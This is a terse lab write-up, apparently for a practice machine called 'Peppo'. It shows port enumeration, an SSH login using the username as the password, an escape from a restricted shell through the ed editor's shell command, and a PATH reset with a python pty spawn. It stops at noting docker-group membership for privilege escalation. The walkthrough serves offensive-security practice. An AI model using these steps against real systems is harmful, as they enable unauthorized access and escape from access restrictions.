Peppo
Enumeration
10000/tcp open snet-sensor-mgmt?
|_auth-owners: eleanorInitial Access
$ ssh eleanor@192.168.189.60
eleanor:eleanor
-rbash: cat: command not found
eleanor@peppo:~$ ls bin
chmod chown ed ls mv ping sleep touchEscaping restricted shell
https://gtfobins.github.io/gtfobins/ed/
$ ed
!/bin/shPATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
$ python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/binPrivEsc
Eleanor is in docker group.
Last updated